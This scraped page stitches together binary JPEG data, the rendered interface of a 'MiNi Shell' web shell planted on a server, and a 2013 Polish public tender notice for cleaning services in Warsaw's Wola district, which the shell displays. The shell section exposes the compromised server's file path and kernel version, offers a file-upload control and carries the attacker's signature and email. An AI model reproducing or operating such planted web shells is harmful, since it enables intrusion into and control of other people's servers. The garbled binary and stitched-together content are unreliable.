JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131025/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131025/224397-N-2013.html

<p class="kh_header"><b>Warszawa: świadczenie usługi sprzątania siedzib Zakładu Gospodarowania Nieruchomościami w Dzielnicy Wola m. st. Warszawy Bema 70 w  okresie od 01.12.2013 r. do 30.11.2014 r.</b><br>
<b>Numer ogłoszenia: 224397 - 2013; data zamieszczenia: 25.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Wola m. st. Warszawy , ul. gen. Józefa Bema 70, 01-225 Warszawa, woj. mazowieckie, tel. 022 6323215, faks 022 6327242.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnwola.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usługi sprzątania siedzib Zakładu Gospodarowania Nieruchomościami w Dzielnicy Wola m. st. Warszawy Bema 70 w  okresie od 01.12.2013 r. do 30.11.2014 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac objętych przedmiotowym zamówieniem obejmuje:

 Czynności podlegające wynagrodzeniu miesięcznemu:

1.	Codziennie:
1.	opróżnianie i wymiana worków foliowych w pojemnikach na śmieci, 
2.	wynoszenie śmieci do punktów zbiorczych (Zamawiający segreguje śmieci)
3.	usuwanie kurzu z wszelkich powierzchni płaskich: mebli, biurek, parapetów,
4.	usuwanie na bieżąco odcisków na powierzchniach szklanych, lustrach,
5.	odkurzanie, zamiatanie i mycie na mokro powierzchni podłóg, klatek schodowych, wycieraczek, (mycie podłóg z zastosowaniem specjalistycznych środków odpowiednich do danego rodzaju podłogi: wykładzin tarkett optima - korytarze, pokoje; lakierowane drewno-schody, panele podłogowe -  pokoje)
6.	utrzymanie w czystości pomieszczenia przeznaczonego na przechowywanie sprzętu                i materiałów czystościowych,
7.	odkurzanie wszystkich powierzchni pokrytych wykładziną dywanową,
8.	czyszczenie i dezynfekcja wszystkich urządzeń sanitarnych środkami do tego przeznaczonymi,
9.	mycie urządzeń sanitarnych, glazury koło umywalek,  luster,
10.	mycie podłóg w toaletach środkami myjąco-dezynfekującymi,
11.	mycie pojemników na mydło, papier toaletowy, ręczniki,
12.	stosowanie w  toaletach  preparatów  zapachowych, 
13.	oczyszczanie popielnic z niedopałków (popielnice ustawione w miejscach wskazanych przez Zamawiającego).

2.Raz w tygodniu :
1.	usuwanie zanieczyszczeń z drzwi wewnętrznych do pokoi biurowych, parapetów, ścianek działowych, grzejników, oraz usuwanie kurzu z kratek wentylacyjnych  i wyciągów,
2.	odkurzanie i czyszczenie tapicerki meblowej, mycie całej glazury, lamperii,  
3.	drzwi wejściowych oraz sztucznych kwiatów.
4.	mycie nóg krzeseł, podstaw foteli obrotowych , poręczy na klatkach schodowych
5.	mycie listew przypodłogowych,
6.	mycie glazury w łazienkach i pomieszczeniach socjalnych,

3. Raz w miesiącu :
1.	mycie koszy na śmieci,
2.	wycieranie na mokro z kurzu górnych części szaf ,
3.	mycie oszklonych gablot i tablic informacyjnych na korytarzach,
4.	czyszczenie szafek gaśnic na korytarzach,
5.	 usuwanie pajęczyn,
6.	 wycieranie wyłączników światła,
7.	 mycie kaloryferów,
8.	 wymiana wkładów zapachowych w toaletach,
9.	mycie drzwi wejściowych do budynków siedzib oraz podestów przed siedzibami

4.Dwa razy w miesiącu : 
1.	zamiatanie i mycie korytarzy piwnicznych, pomieszczeń magazynowych, archiwów, świetlic, nie wliczonych do codziennego sprzątania udostępnianych przez pracownika   Zamawiającego

       5.Dwa razy w roku w terminach:14.03.2014 r.- 15.04.2014 r. oraz 12.09.2014 r  - 13.10.2014 r.
1.	wykonanie wszystkich czynności porządkowych dostosowanych do rodzaju istniejących podłóg  (PCV Tarkett Optima, wykładziny dywanowe, gres, terakota, panele podłogowe, PCV) pozwalających na stwierdzenie utrzymania ich we właściwym stanie sanitarnym               i porządkowym, 
Wykaz czynności: 
a)  odkurzanie, mycie, czyszczenie lub pranie, ręczne lub mechaniczne  - podłogi                     i wykładziny we wszystkich pomieszczeniach,
b)   mechaniczne lub ręczne zdejmowanie powłok nabłyszczających lub ochronnych, nakładanie właściwych  środków nabłyszczających ( 2-3 warstwy), polerowanie - punkt ten dotyczy tylko ciągów komunikacyjnych - korytarzy na których położone są wykładziny PCV, tarkett, w lokalizacjach  ul. Bema 70 , ul. Nowolipki 16 i I-sze piętro razem  ok.200m2
2.	 mycie punktów świetlnych,
3.	sprzątanie baszt przy ul. Bema (zamiatanie, mycie na mokro),
4.	mycie okien, parapetów zewnętrznych i ram okiennych.
5.	mycie żaluzji,
6.	mycie krat zewnętrznych,
7.	mycie i dezynfekowanie aparatów telefonicznych (dezynfekowanie jednorazową chusteczką słuchawek, mycie całego aparatu stosownymi preparatami)
8.	Odkurzenie  (odświeżenie)  verticali, rolet,
9.	pranie tapicerek krzeseł i foteli 

6.	Jeden raz w roku: 
Zamiatanie, mycie powierzchni podłóg w budynku przy ul. Wolskiej 176, po uzgodnieniu terminu z pracownikiem Zamawiającego, w okresie trwania umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.92.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3000,00</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie wiedzy i doświadczenia oraz wykazania, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawcy wykonali lub wykonują  co najmniej 2 usługi w zakresie sprzątania w budynkach użyteczności publicznej, o wartości brutto nie mniejszej niż 100 tys. zł każda
Wykonawca może polegać na wiedzy i doświadczeniu oraz sytuacji ekonomicznej    i finansowej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji winien dołączyć do oferty pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie  zamówienia, wymagane warunki mogą spełniać łącznie, tzn.: spełnienie warunku dotyczącego:
- wymaganej wiedzy i doświadczenia będzie polegało na wykazaniu co najmniej przez np. dwóch spośród Wykonawców występujących wspólnie, minimum po jednej wykonanej  z 2 usług w budynkach użyteczności publicznej w zakresie sprzątania, o wartości brutto nie mniejszej niż 100 tys. zł każda lub na wykazaniu przez co najmniej jednego z Wykonawców minimum dwóch wykonanych usług spełniających powyższe wymagania, 
-  wymaganej sytuacji ekonomicznej i finansowej będzie polegało na wykazaniu jej przez co najmniej jednego z Wykonawców występujących wspólnie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - posiadania aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 100 tys. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>w przypadku, gdy Wykonawca będzie polegać na wiedzy i doświadczeniu oraz sytuacji                   ekonomicznej innych podmiotów - Wykonawca w takiej sytuacji winien dołączyć do oferty dokumenty potwierdzające oddanie mu do dyspozycji niezbędnych zasobów   w stopniu niezbędnym dla należytego wykonania zamówienia oraz potwierdzające, że stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, tj
	- opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia,
	- dokumenty dotyczące w szczególności:
            - zakresu dostępnych wykonawcy zasobów innego podmiotu;
            - sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy   
              wykonywaniu zamówienia;
            - charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem
           - zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.

Jeżeli Wykonawca, wykazując spełnienie warunków udziału w postepowaniu, będzie polegał na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest przedstawić w odniesieniu do tych podmiotów dokumenty na potwierdzenie braku podstaw do ich wykluczenia z przedmiotowego postępowania, wymienionych w pkt 2.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do postanowień art. 144 ust. 1 ustawy - Prawo zamówień publicznych, Zamawiający  nie przewiduje możliwości dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnwola.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na wniosek wykonawcy,w term.5dni: w siedzibie zamawiaj p.19,pon.-pt.od g.12-14,na konto zamawiającego25103015080000000550882019,zazaliczeniem poczt.lub w kasie ul.Bema70, pok.18.Opłata wynosi 15 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2013 godzina 10:00, miejsce: w siedzibie Zamawiającego w Warszawie, przy ul. Bema 70, pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com